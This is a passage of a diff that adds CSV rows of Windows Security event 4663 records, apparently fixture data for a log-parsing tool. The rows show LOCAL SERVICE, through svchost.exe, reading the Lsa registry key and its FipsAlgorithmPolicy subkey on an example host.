+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452907</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452906</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452905</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452904</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452903</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452902</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452901</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452900</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452899</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452898</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452897</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452896</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452895</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452894</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452893</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452892</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
